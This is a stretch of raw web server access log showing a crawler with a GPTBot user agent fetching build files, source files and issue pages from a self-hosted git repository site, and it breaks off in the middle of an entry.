"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24303] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13923] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" +[17/Feb/2026:18:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:18:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10105] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:18:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:18:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11278] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:18:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:18:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13362] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10097] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:18:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:18:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:18:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11762] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:18:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13020] [Gzip 6.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:18:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:18:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13367] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=open&type=all" +[17/Feb/2026:18:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10122] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:18:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 17195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 